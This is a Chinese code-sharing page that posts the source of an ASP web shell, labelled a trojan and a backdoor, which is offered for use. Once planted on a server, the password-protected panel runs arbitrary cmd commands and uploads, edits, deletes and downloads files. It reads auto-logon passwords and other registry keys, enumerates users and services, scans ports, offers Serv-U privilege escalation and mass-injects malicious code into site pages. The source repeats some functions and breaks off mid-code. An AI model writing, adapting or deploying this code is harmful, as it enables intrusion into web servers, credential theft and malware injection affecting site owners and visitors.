一款不错的asp木马 黑色界面
程序员文章站
2023-11-07 11:36:40
<% server.scripttimeout=999999999 response.buffer =true on error res...
<%
server.scripttimeout=999999999
response.buffer =true
on error resume next
userpass="643617" '密码
mname="by:.尐飛" '后门名字
copyright="注:请勿用于非法用途,否则后果作者概不负责" '版权
server.scripttimeout=999999999
response.buffer =true
on error resume next
sub showerr()
if err then
rrs"<br><a href='javascript:history.back()'><br> " &
err.description & "</a><br>"
err.clear:response.flush
end if
end sub
sub rrs(str)
response.write(str)
end sub
function repath(s)
repath=replace(s,"\","\\")
end function
function rrepath(s)
rrepath=replace(s,"\\","\")
end function
url=request.servervariables("url")
serverip=request.servervariables("local_addr")
action=request("action")
rootpath=server.mappath(".")
wwwroot=server.mappath("/")
serveru=request.servervariables("http_host")&url
serverp=userpass
folderpath=request("folderpath")
fname=request("fname")
backurl="<br><br><center><a href='javascript:history.back()'>返回
</a></center>"
rrs"<html><meta http-equiv=""content-type"" content=""text/html;
charset=gb2312"">"
rrs"<title>"&mname1&" - "&serverip&" </title>"
rrs"<style type=""text/css"">"
rrs"body,td{font-size: 12px;background-color:#000000;color:#eee;}"
rrs"input,select,textarea{font-size: 12px;background-
color:#ddd;border:1px solid #fff}"
rrs".c{background-color:#000000;border:0px}"
rrs".cmd{background-color:#000;color:#fff}"
rrs"body{margin: 0px;margin-left:4px;}"
rrs"a{color:#ddd;text-decoration: none;}a:hover
{color:red;background:#000}"
rrs".am{color:#888;font-size:11px;}"
rrs"</style>"
rrs"<script language=javascript>function killerrors(){return true;}
window.onerror=killerrors;"
rrs"function yesok(){if (confirm(""确认要执行此操作吗?""))return
true;else return false;}"
rrs"function runclock(){thetime = window.settimeout(""runclock()"",
100);var today = new date();var display= today.tolocalestring
();window.status=""→"&ad&" --""+display;}runclock();"
rrs"function showfolder(folder){top.addrform.folderpath.value =
folder;top.addrform.submit();}"
rrs"function fullform(fname,faction){top.hideform.fname.value =
fname;if(faction==""copyfile""){dname = prompt(""请输入复制到目标文件全
名称"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""movefile""){dname = prompt(""请输入移动到目标文件全名
称"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""copyfolder""){dname = prompt(""请输入移动到目标文件夹全名称
"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""movefolder""){dname = prompt(""请输入移动到目标文件夹全名称
"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""newfolder""){dname = prompt(""请输入要新建的文件夹全名
称"",fname);top.hideform.fname.value = dname;}else{dname = ""other"";}
if(dname!=null){top.hideform.action.value =
faction;top.hideform.submit();}else{top.hideform.fname.value = """";}}"
rrs"</script>"
rrs "<body"
if action="" then rrs " scroll=no"
rrs ">"
dim obt(13,2)
obt(0,0) = "scripting.filesystemobject"
obt(0,2) = "文件操作组件"
obt(1,0) = "wscript.shell"
obt(1,2) = "命令行执行组件"
obt(2,0) = "adox.catalog"
obt(2,2) = "access建库组件"
obt(3,0) = "jro.jetengine"
obt(3,2) = "access压缩组件"
obt(4,0) = "scripting.dictionary"
obt(4,2) = "数据流上传辅助组件"
obt(5,0) = "adodb.connection"
obt(5,2) = "数据库连接组件"
obt(6,0) = "adodb.stream"
obt(6,2) = "数据流上传组件"
obt(7,0) = "softartisans.fileup"
obt(7,2) = "sa-fileup 文件上传组件"
obt(8,0) = "lyfupload.uploadfile"
obt(8,2) = "刘云峰文件上传组件"
obt(9,0) = "persits.upload.1"
obt(9,2) = "aspupload 文件上传组件"
obt(10,0) = "jmail.smtpmail"
obt(10,2) = "jmail 邮件收发组件"
obt(11,0) = "cdonts.newmail"
obt(11,2) = "虚拟smtp发信组件"
obt(12,0) = "smtpmail.smtpmail.1"
obt(12,2) = "smtpmail发信组件"
obt(13,0) = "microsoft.xmlhttp"
obt(13,2) = "数据传输组件"
for i=0 to 13
set t=server.createobject(obt(i,0))
if -2147221005 <> err then
isobj=" √"
else
isobj=" ×"
err.clear
end if
set t=nothing
obt(i,1)=isobj
next
if folderpath<>"" then
session("folderpath")=rrepath(folderpath)
end if
if session("folderpath")="" then
folderpath=rootpath
session("folderpath")=folderpath
end if
function mainform()
rrs"<form name=""hideform"" method=""post"" action="""&url&"""
target=""fileframe"">"
rrs"<input type=""hidden"" name=""action"">"
rrs"<input type=""hidden"" name=""fname"">"
rrs"</form>"
rrs"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
rrs"<tr><td height='30' colspan='2'>"
rrs"<table width='100%'>"
rrs"<form name='addrform' method='post' action='"&url&"'
target='_parent'>"
rrs"<tr><td width='60' align='center'>地址栏:</td><td>"
rrs"<input name='folderpath' style='width:100%' value='"&session
("folderpath")&"'>"
rrs"</td><td width='140' align='center'><input name='submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='fileframe.location.reload()'>"
rrs"</td></tr></form></table></td></tr><tr><td width='170'>"
rrs"<iframe name='left' src='?action=mainmenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
rrs"<td>"
rrs"<iframe name='fileframe' src='?action=show1file' width='100%'
height='100%' frameborder='1'></iframe>"
rrs"</td></tr></table>"
end function
if request("web")="admin" then
session("web2a2dmin") = userpass
url()
end if
function mainform()
rrs"<form name=""hideform"" method=""post"" action="""&url&"""
target=""fileframe"">"
rrs"<input type=""hidden"" name=""action"">"
rrs"<input type=""hidden"" name=""fname"">"
rrs"</form>"
rrs"<table width='100%' height='100%' border=0 cellpadding='0'
cellspacing='0'>"
rrs"<tr><td height='30' colspan='2'>"
rrs"<table width='100%'>"
rrs"<form name='addrform' method='post' action='"&url&"'
target='_parent'>"
rrs"<tr><td width='60' align='center'>地址栏:</td><td>"
rrs"<input name='folderpath' style='width:100%' value='"&session
("folderpath")&"'>"
rrs"</td><td width='140' align='center'><input name='submit'
type='submit' value='转到'> <input type='submit' value='刷新主窗口'
onclick='fileframe.location.reload()'>"
rrs"</td></tr></form></table></td></tr><tr><td width='170'>"
rrs"<iframe name='left' src='?action=mainmenu' width='100%'
height='100%' frameborder='0'></iframe></td>"
rrs"<td>"
rrs"<iframe name='fileframe' src='?action=show1file' width='100%'
height='100%' frameborder='1'></iframe>"
rrs"</td></tr></table>"
end function
function mainmenu()
rrs"<table width='100%' cellspacing='0' cellpadding='0'>"
rrs"<tr><td height='5'></td></tr>"
rrs"<tr><td><center><a href='"&siteurl2&"' target='_blank'><font
color=red>"&mname2&"</font></center></a><hr hight=1 width='100%'>"
rrs"</td></tr>"
if obt(0,1)=" ×" then
rrs"<tr><td height='24'>无权限</td></tr>"
else
rrs"<tr><td height=22 onmouseover=""menu1.style.display=''""> ↓查看硬
盘<div id=menu1 style=""width:100%;display='none'""
onmouseout=""menu1.style.display='none'"">"
set abc=new lbf:rrs abc.showdriver():set abc=nothing
rrs"</div></td></tr><tr><td height='20'><a href='javascript:showfolder
("""&repath(wwwroot)&""")'>->站点根目录</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder("""&repath
(rootpath)&""")'>→本程序目录</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\program
files"")'>→program files</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents
and settings\\all users\\documents"")'>->documents</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents
and settings\\all users\\application data\\symantec\\pcanywhere"")'>-
>pcanywhere</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents
and settings\\all users\\「开始」菜单\\程序"")'>->开始 <b>→</b> 程序
<hr></a></td></tr>"
end if
rrs"<tr><td height='22'><a href='?action=course' target='fileframe'>→
系统服务-用户账号</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=getterminalinfo'
target='fileframe'>→终端端口-自动登录</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=serverinfo'
target='fileframe'>→服务信息-组件支持</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cmd1shell' target='fileframe'>
→执行cmd命令</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=scanport' target='fileframe'>
→端口扫描器</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=servu' target='fileframe'>→
serv-u提权</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=readreg' target='fileframe'>→
读取注册表</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:fullform("""&repath
(session("folderpath")&"\newfolder")&""",""newfolder"")'>→新建目录
<hr></a></td></tr>"
rrs"<tr><td height='20'><a href='?action=editfile' target='fileframe'>
→新建文本</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=upfile' target='fileframe'>→
上传文件</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=kmuma' target='fileframe'>→查
找木马</b></a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=1' target='fileframe'>
→高级挂马</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=2' target='fileframe'>
→批量清马</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=3' target='fileframe'>
→批量替换</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=plgm' target='fileframe'></b>
→低级挂马</a></b></td></tr>"
rrs"<tr><td height='22'><a href='?action=logout' target='_top'>→退出登
录</a></td></tr>"
rrs"<tr><td align=center
style='color:red'><hr>"©right2&"</td></tr></table>"
rrs"</table>"
end function
sub unpack(thepath)
on error resume next
server.scripttimeout = 5000
dim rs, ws, str, conn, stream, connstr, thefolder
str = server.mappath(".") & "\"
set rs = createobject("adodb.recordset")
set stream = createobject("adodb.stream")
set conn = createobject("adodb.connection")
connstr = "provider=microsoft.jet.oledb.4.0;data
source=" & thepath & ";"
conn.open connstr
rs.open "filedata", conn, 1, 1
stream.open
stream.type = 1
do until rs.eof
thefolder = left(rs("thepath"), instrrev(rs
("thepath"), "\"))
if fsox.folderexists(str & thefolder) = false
then
createfolder(str & thefolder)
end if
stream.seteos()
stream.write rs("filecontent")
stream.savetofile str & rs("thepath"), 2
rs.movenext
loop
rs.close
conn.close
stream.close
set ws = nothing
set rs = nothing
set stream = nothing
set conn = nothing
end sub
sub createfolder(thepath)
dim i
i = instr(thepath, "\")
do while i > 0
if fsox.folderexists(left(thepath, i)) = false
then
fsox.createfolder(left(thepath, i - 1))
end if
if instr(mid(thepath, i + 1), "\") then
i = i + instr(mid(thepath, i + 1), "\")
else
i = 0
end if
loop
end sub
function course()
si="<br><table width='600' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
si=si&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>系
统用户与服务</td></tr>"
on error resume next
for each obj in getobject("winnt://.")
err.clear
if obj.starttype="" then
si=si&"<tr>"
si=si&"<td height=""20"" bgcolor=""#ffffff""> "
si=si&obj.name
si=si&"</td><td bgcolor=""#ffffff""> "
si=si&"系统用户(组)"
si=si&"</td></tr>"
si0="<tr><td height=""20"" bgcolor=""#ffffff""
colspan=""2""> </td></tr>"
end if
if obj.starttype=2 then lx="自动"
if obj.starttype=3 then lx="手动"
if obj.starttype=4 then lx="禁用"
if lcase(mid(obj.path,4,3))<>"win" and obj.starttype=2 then
si1=si1&"<tr><td height=""20""
bgcolor=""#ffffff""> "&obj.name&"</td><td height=""20""
bgcolor=""#ffffff""> "&obj.displayname&"<tr><td height=""20""
bgcolor=""#ffffff"" colspan=""2"">[启动类型:"&lx&"]<font
color=#ff0000> "&obj.path&"</font></td></tr>"
else
si2=si2&"<tr><td height=""20""
bgcolor=""#ffffff""> "&obj.name&"</td><td height=""20""
bgcolor=""#ffffff""> "&obj.displayname&"<tr><td height=""20""
bgcolor=""#ffffff"" colspan=""2"">[启动类型:"&lx&"]<font
color=#3399ff> "&obj.path&"</font></td></tr>"
end if
next
rrs si&si0&si1&si2&"</table>"
end function
function serverinfo()
si="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1'
cellpadding='0' align='center'>"
si=si&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>服
务器组件信息</td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器名</td><td bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("server_name")&"</td></tr>"
si=si&"<form method=post action='http://www.ip138.com/index.asp'
name='ipform' target='_blank'><tr align='center'><td height='20'
width='200' bgcolor='#ffffff'>服务器ip</td><td
bgcolor='#ffffff'> </td><td bgcolor='#ffffff'>"
si=si&"<input type='text' name='ip' size='15'
value='"&request.servervariables("local_addr")
&"'style='border:0px'><input type='submit' value='查
询'style='border:0px'><input type='hidden' name='action'
value='2'></td></tr></form>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器时间</td><td bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&now&" </td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器cpu数量</td><td
bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("number_of_processors")
&"</td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>服务器操作系统</td><td
bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("os")&"</td></tr>"
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>web服务器版本</td><td
bgcolor='#ffffff'> </td><td
bgcolor='#ffffff'>"&request.servervariables("server_software")
&"</td></tr>"
for i=0 to 13
si=si&"<tr align='center'><td height='20' width='200'
bgcolor='#ffffff'>"&obt(i,0)&"</td><td bgcolor='#ffffff'>"&obt(i,1)
&"</td><td bgcolor='#ffffff' align=left>"&obt(i,2)&"</td></tr>"
next
rrs si
end function
function downfile(path)
response.clear
set osm = createobject(obt(6,0))
osm.open
osm.type = 1
osm.loadfromfile path
sz=instrrev(path,"\")+1
response.addheader "content-disposition", "attachment; filename=" &
mid(path,sz)
response.addheader "content-length", osm.size
response.charset = "utf-8"
response.contenttype = "application/octet-stream"
response.binarywrite osm.read
response.flush
osm.close
set osm = nothing
end function
function htmlencode(s)
if not isnull(s) then
s = replace(s, ">", ">")
s = replace(s, "<", "<")
s = replace(s, chr(39), "'")
s = replace(s, chr(34), """)
s = replace(s, chr(20), " ")
htmlencode = s
end if
end function
function upfile()
if request("action2")="post" then
set u=new upc : set f=u.ua("localfile")
uname=u.form("topath")
if uname="" or f.filesize=0 then
si="<br>请输入上传的完全路径后选择一个文件上传!"
else
f.saveas uname
if err.number=0 then
si="<center><br><br><br>文件"&uname&"上传成功!</center>"
end if
end if
set f=nothing:set u=nothing
si=si&backurl
rrs si
showerr()
response.end
end if
si="<br><br><br><table border='0' cellpadding='0' cellspacing='0'
align='center'>"
si=si&"<form name='upform' method='post' action='"&url&"?
action=upfile&action2=post' enctype='multipart/form-data'>"
si=si&"<tr><td>"
si=si&"上传路径:<input name='topath' value='"&rrepath(session
("folderpath")&"\diy3.asp")&"' size='40'>"
si=si&" <input name='localfile' type='file' size='25'>"
si=si&" <input type='submit' name='submit' value='上传'>"
si=si&"</td></tr></form></table>"
rrs si
end function
function cmd1shell()
checked=" checked"
if request("sp")<>"" then session("shellpath") = request("sp")
shellpath=session("shellpath")
if shellpath="" then shellpath = "diy3.asp"
if request("wscript")<>"yes" then checked=""
if request("cmd")<>"" then defcmd = request("cmd")
si="<form method='post'>"
si=si&"shell路径:<input name='sp' value='"&shellpath&"'
style='width:70%'> "
si=si&"<input class=c type='checkbox' name='wscript'
value='yes'"&checked&">wscript.shell"
si=si&"<input name='cmd' style='width:92%' value='"&defcmd&"'> <input
type='submit' value='执行'><textarea style='width:100%;height:440;'
class='cmd'>"
if request.form("cmd")<>"" then
if request.form("wscript")="yes" then
set cm=createobject(obt(1,0))
set dd=cm.exec(shellpath&" /c "&defcmd)
aaa=dd.stdout.readall
si=si&aaa
else
on error resume next
set ws=server.createobject("wscript.shell")
set ws=server.createobject("wscript.shell")
set fso=server.createobject("scripting.filesystemobject")
sztempfile = server.mappath("cmd.txt")
call ws.run (shellpath&" /c " & defcmd & " > " & sztempfile, 0, true)
set fs = createobject("scripting.filesystemobject")
set ofilelcx = fs.opentextfile (sztempfile, 1, false, 0)
aaa=server.htmlencode(ofilelcx.readall)
ofilelcx.close
call fso.deletefile(sztempfile, true)
si=si&aaa
end if
end if
si=si&chr(13)&"</textarea></form>"
rrs si
end function
if session("web2a2dmin")<>userpass then
if request.form("pass")<>"" then
if request.form("pass")=userpass then
session("web2a2dmin")=userpass
response.redirect url
else
rrs"<br><br><br><b><div align=center><font size='14' color='red'>注:
请勿用于非法用途,否则后果自负!!!</font></b> <br><br><br><br><b><div
align=center><font size='14' color='lime'>hack by:漫步云端
</font></b></p>"
end if
else
si="<center><div style='width:500px;border:1px solid
#222;padding:22px;margin:100px;'><br><a href='"&siteurl&"'
target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>
密码:<input name='pass' type='password' size='22'> <input
type='submit' value='登录'><hr>"©right&"</center>"
if instr(si,sic)<>0 then rrs si
end if
response.end
end if
dim t1
class upc
dim d1,d2
public function form(f)
f=lcase(f)
if d1.exists(f) then:form=d1(f):else:form="":end if
end function
public function ua(f)
f=lcase(f)
if d2.exists(f) then:set ua=d2(f):else:set ua=new fif:end if
end function
private sub class_initialize
dim
tda,tst,vbcrlf,tin,diend,t2,tlen,tfl,sfv,fstart,fend,dstart,dend,upname
set d1=createobject(obt(4,0))
if request.totalbytes<1 then exit sub
set t1 = createobject(obt(6,0))
t1.type = 1 : t1.mode =3 : t1.open
t1.write request.binaryread(request.totalbytes)
t1.position=0 : tda =t1.read : dstart = 1
dend = lenb(tda)
set d2=createobject(obt(4,0))
vbcrlf = chrb(13) & chrb(10)
set t2 = createobject(obt(6,0))
tst = midb(tda,1, instrb(dstart,tda,vbcrlf)-1)
tlen = lenb (tst)
dstart=dstart+tlen+1
while (dstart + 10) < dend
diend = instrb(dstart,tda,vbcrlf & vbcrlf)+3
t2.type = 1 : t2.mode =3 : t2.open
t1.position = dstart
t1.copyto t2,diend-dstart
t2.position = 0 : t2.type = 2 : t2.charset ="gb2312"
tin = t2.readtext : t2.close
dstart = instrb(diend,tda,tst)
fstart = instr(22,tin,"name=""",1)+6
fend = instr(fstart,tin,"""",1)
upname = lcase(mid (tin,fstart,fend-fstart))
if instr (45,tin,"filename=""",1) > 0 then
set tfl=new fif
fstart = instr(fend,tin,"filename=""",1)+10
fend = instr(fstart,tin,"""",1)
fstart = instr(fend,tin,"content-type: ",1)+14
fend = instr(fstart,tin,vbcr)
tfl.filestart =diend
tfl.filesize = dstart -diend -3
if not d2.exists(upname) then
d2.add upname,tfl
end if
else
t2.type =1 : t2.mode =3 : t2.open
t1.position = diend : t1.copyto t2,dstart-diend-3
t2.position = 0 : t2.type = 2
t2.charset ="gb2312"
sfv = t2.readtext
t2.close
if d1.exists(upname) then
d1(upname)=d1(upname)&", "&sfv
else
d1.add upname,sfv
end if
end if
dstart=dstart+tlen+1
wend
tda=""
set t2 =nothing
end sub
private sub class_terminate
if request.totalbytes>0 then
d1.removeall:d2.removeall
set d1=nothing:set d2=nothing
t1.close:set t1 =nothing
end if
end sub
end class
class fif
dim filesize,filestart
private sub class_initialize
filesize = 0
filestart= 0
end sub
public function saveas(f)
dim t3
saveas=true
if trim(f)="" or filestart=0 then exit function
set t3=createobject(obt(6,0))
t3.mode=3 : t3.type=1 : t3.open
t1.position=filestart
t1.copyto t3,filesize
t3.savetofile f,2
t3.close
set t3=nothing
saveas=false
end function
end class
class lbf
dim cf
private sub class_initialize
set cf=createobject(obt(0,0))
end sub
private sub class_terminate
set cf=nothing
end sub
function showdriver()
for each d in cf.drives
rrs" <a href='javascript:showfolder
("""&d.driveletter&":\\"")'>本地磁盘 ("&d.driveletter&":)</a><br>"
next
end function
function show1file(path)
set fold=cf.getfolder(path)
i=0
si="<table width='100%' border='0' cellspacing='0'
cellpadding='0'><tr>"
for each f in fold.subfolders
si=si&"<td height=10>"
si=si&"<a href='javascript:showfolder("""&repath(path&"\"&f.name)
&""")' title=""打开""><font face='wingdings'
size='6'>0</font>"&f.name&"</a>"
si=si&" _<a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""copyfolder"")' onclick='return yesok()'
class='am' title='复制'>复制</a>"
si=si&" <a href='javascript:fullform("""&replace
(path&"\"&f.name,"\","\\")&""",""delfolder"")' onclick='return yesok
()' class='am' title='删除'>删除</a>"
si=si&" <a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""movefolder"")' onclick='return yesok()'
class='am' title='移动'>移动</a>"
si=si&" <a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""downfile"")' onclick='return yesok()'
class='am' title='下载'>下载</a></td>"
i=i+1
if i mod 3 = 0 then si=si&"</tr><tr>"
next
si=si&"</tr><tr><td height=2></td></tr></table>"
rrs si &"<hr noshade color=""#cccccc"" size=1 color=""#"" />" :
si=""
for each l in fold.files
si="<table width='100%' border='0' cellspacing='0'
cellpadding='0'>"
si=si&"<tr style='boungroup-color:#'>"
si=si&"<td height='30'><a href='javascript:fullform("""&repath
(path&"\"&l.name)&""",""downfile"");' title='下载'><font
face='wingdings' size='4'>2</font>"&l.name&"</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""editfile"")' class='am' title='编辑'>编辑</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""copyfile"")' class='am' title='复制'>复制</a></td>"
si=si&"<td width='40' align=""center""><a
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""movefile"")' class='am' title='移动'>移动</a></td>"
si=si&"<td width='50' align=""center"">"&clng(l.size/1024)&"k</td>"
si=si&"<td width='200' align=""center"">"&l.type&"</td>"
si=si&"<td width='160'>"&l.datelastmodified&"</td>"
si=si&"</tr></table>"
rrs si:si=""
next
set fold=nothing
end function
function delfile(path)
if cf.fileexists(path) then
cf.deletefile path
si="<center><br><br><br>文件 "&path&" 删除成功!</center>"
si=si&backurl
rrs si
end if
end function
function editfile(path)
if request("action2")="post" then
set t=cf.createtextfile(path)
t.writeline request.form("content")
t.close
set t=nothing
si="<center><br><br><br>文件保存成功!</center>"
si=si&backurl
rrs si
response.end
end if
if path<>"" then
set t=cf.opentextfile(path, 1, false)
txt=htmlencode(t.readall)
t.close
set t=nothing
else
path=session("folderpath")&"\newfile.asp":txt="新建文件"
end if
si=si&"<form action='"&url&"?action2=post' method='post'
name='editform'>"
si=si&"<input name='action' value='editfile' type='hidden'>"
si=si&"<input name='fname' value='"&path&"' style='width:100%'><br>"
si=si&"<textarea name='content'
style='width:100%;height:450'>"&txt&"</textarea><br>"
si=si&"<hr><input name='goback' type='button' value='返回'
onclick='history.back();'> <input name='reset'
type='reset' value='重置'> <input name='submit'
type='submit' value='保存'></form>"
rrs si
end function
function copyfile(path)
path = split(path,"||||")
if cf.fileexists(path(0)) and path(1)<>"" then
cf.copyfile path(0),path(1)
si="<center><br><br><br>文件"&path(0)&"复制成功!</center>"
si=si&backurl
rrs si
end if
end function
function movefile(path)
path = split(path,"||||")
if cf.fileexists(path(0)) and path(1)<>"" then
cf.movefile path(0),path(1)
si="<center><br><br><br>文件"&path(0)&"移动成功!</center>"
si=si&backurl
rrs si
end if
end function
function delfolder(path)
if cf.folderexists(path) then
cf.deletefolder path
si="<center><br><br><br>目录"&path&"删除成功!</center>"
si=si&backurl
rrs si
end if
end function
function copyfolder(path)
path = split(path,"||||")
if cf.folderexists(path(0)) and path(1)<>"" then
cf.copyfolder path(0),path(1)
si="<center><br><br><br>目录"&path(0)&"复制成功!</center>"
si=si&backurl
rrs si
end if
end function
function movefolder(path)
path = split(path,"||||")
if cf.folderexists(path(0)) and path(1)<>"" then
cf.movefolder path(0),path(1)
si="<center><br><br><br>目录"&path(0)&"移动成功!</center>"
si=si&backurl
rrs si
end if
end function
function newfolder(path)
if not cf.folderexists(path) and path<>"" then
cf.createfolder path
si="<center><br><br><br>目录"&path&"新建成功!</center>"
si=si&backurl
rrs si
end if
end function
end class
sub getterminalinfo()
on error resume next
set wsx = server.createobject("wscript.shell")
dim terminalportpath, terminalportkey, termport
dim autologinpath, autologinuserkey, autologinpasskey
dim isautologinenable, autologinenablekey, autologinusername,
autologinpassword
terminalportpath = "hklm\system\currentcontrolset\control\terminal
server\winstations\rdp-tcp\"
terminalportkey = "portnumber"
termport = wsx.regread(terminalportpath & terminalportkey)
rrs "终端服务端口及自动登录<hr/><ol>"
if termport = "" or err.number <> 0 then
rrs"无法得到终端服务端口, 请检查权限是否已经受到限制.<br/>"
else
rrs "当前终端服务端口: " & termport & "<br/>"
end if
autologinpath = "hkey_local_machine\software\microsoft\windows
nt\currentversion\winlogon\"
autologinenablekey = "autoadminlogon"
autologinuserkey = "defaultusername"
autologinpasskey = "defaultpassword"
isautologinenable = wsx.regread(autologinpath & autologinenablekey)
if isautologinenable = 0 then
rrs "系统自动登录功能未开启<br/>"
else
autologinusername = wsx.regread(autologinpath & autologinuserkey)
rrs "自动登录的系统帐户: " & autologinusername & "<br>"
autologinpassword = wsx.regread(autologinpath & autologinpasskey)
if err then
err.clear
rrs "false"
end if
rrs "自动登录的帐户密码: " & autologinpassword & "<br>"
end if
rrs "</ol>"
end sub
sub readreg()
rrs "注册表键值读取:<hr/>"
rrs "<form method=post>"
rrs "<input type=hidden value=readreg name=theact>"
rrs "<input name=thepath
value='hklm\system\currentcontrolset\control\computername\computername\
computername' size=80>"
rrs " <input type=submit value=' 读取 '>"
rrs "<span id=regeditinfo style='display:none;'><hr/>"
rrs "hklm\software\microsoft\windows\currentversion\winlogon\dont-
displaylastusername,reg_sz,1 {不显示上次登录用户}<br/>"
rrs
"hklm\system\currentcontrolset\control\lsa\restrictanonymous,reg_dword,
0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机ipc$共享
}<br/>"
rrs
"hklm\system\currentcontrolset\services\lanmanserver\parameters\autosha
reserver,reg_dword,0 {禁止默认共享}<br/>"
rrs
"hklm\system\currentcontrolset\services\lanmanserver\parameters\enables
harednetdrives,reg_sz,0 {关闭网络共享}<br/>"
rrs
"hklm\system\currentcontrolset\services\tcpip\parameters\enablesecurity
filters,reg_dword,1 {启用tcp/ip筛选(所有试配器)}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\ipenablerouter,reg_dword,1 {允许ip路由}
<br/>"
rrs "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
rrs
"hklm\system\currentcontrolset\services\tcpip\parameters\interfaces\{8a
465128-8e99-4b0c-aff3-1348dc55eb2e}\defaultgateway,reg_muti_sz {默认网
关}<br/>"
rrs
"hklm\system\currentcontrolset\services\tcpip\parameters\interfaces\{8a
465128-8e99-4b0c-aff3-1348dc55eb2e}\nameserver {首dns}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\interfaces\{8a465128-8e99-4b0c-aff3-
1348dc55eb2e}\tcpallowedports {允许的tcp/ip端口}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\interfaces\{8a465128-8e99-4b0c-aff3-
1348dc55eb2e}\udpallowedports {允许的udp端口}<br/>"
rrs "-----------over--------------------<br/>"
rrs "hklm\system\controlset001\services\tcpip\enum\count {共几块活动网
卡}<br/>"
rrs "hklm\system\controlset001\services\tcpip\linkage\bind {当前网卡的
序列(把上面的替换)}<br/>"
rrs "</span>"
rrs "</form><hr/>"
if request("thepath")<>"" then
on error resume next
set wsx = server.createobject("wscript.shell")
thepath=request("thepath")
thearray=wsx.regread(thepath)
if isarray(thearray) then
for i=0 to ubound(thearray)
rrs "<li>" & thearray(i)
next
else
rrs "<li>" & thearray
end if
end if
end sub
sub scanport()
server.scripttimeout = 7776000
if request.form("port")="" then
portlist="21,23,25,80,110,135,139,445,1433,3389,43958"
else
portlist=request.form("port")
end if
if request.form("ip")="" then
ip="127.0.0.1"
else
ip=request.form("ip")
end if
rrs"<p>端口扫描器</p>"
rrs"<form name='form1' method='post' action=''
onsubmit='form1.submit.disabled=true;'>"
rrs"<p>scan ip: "
rrs" <input name='ip' type='text' class='textbox' id='ip'
value='"&request.servervariables("local_addr")&"' size='60'>"
rrs"<br>port list:"
rrs"<input name='port' type='text' class='textbox' size='60'
value='"&portlist&"'>"
rrs"<br><br>"
rrs"<input name='submit' type='submit' class='buttom' value=' 扫描 '>"
rrs"<input name='scan' type='hidden' id='scan' value='111'>"
rrs"</p></form>"
if request.form("scan") <> "" then
timer1 = timer
rrs("<b>扫描报告:</b><br><hr>")
tmp = split(request.form("port"),",")
ip = split(request.form("ip"),",")
for hu = 0 to ubound(ip)
if instr(ip(hu),"-") = 0 then
for i = 0 to ubound(tmp)
if isnumeric(tmp(i)) then
call scan(ip(hu), tmp(i))
else
seekx = instr(tmp(i), "-")
if seekx > 0 then
startn = left(tmp(i), seekx - 1 )
endn = right(tmp(i), len(tmp(i)) - seekx )
if isnumeric(startn) and isnumeric(endn) then
for j = startn to endn
call scan(ip(hu), j)
next
else
rrs(startn & " or " & endn & " is not number<br>")
end if
else
rrs(tmp(i) & " is not number<br>")
end if
end if
next
else
ipstart = mid(ip(hu),1,instrrev(ip(hu),"."))
for xxx = mid(ip(hu),instrrev(ip(hu),".")+1,1) to mid(ip(hu),instr(ip
(hu),"-")+1,len(ip(hu))-instr(ip(hu),"-"))
for i = 0 to ubound(tmp)
if isnumeric(tmp(i)) then
call scan(ipstart & xxx, tmp(i))
else
seekx = instr(tmp(i), "-")
if seekx > 0 then
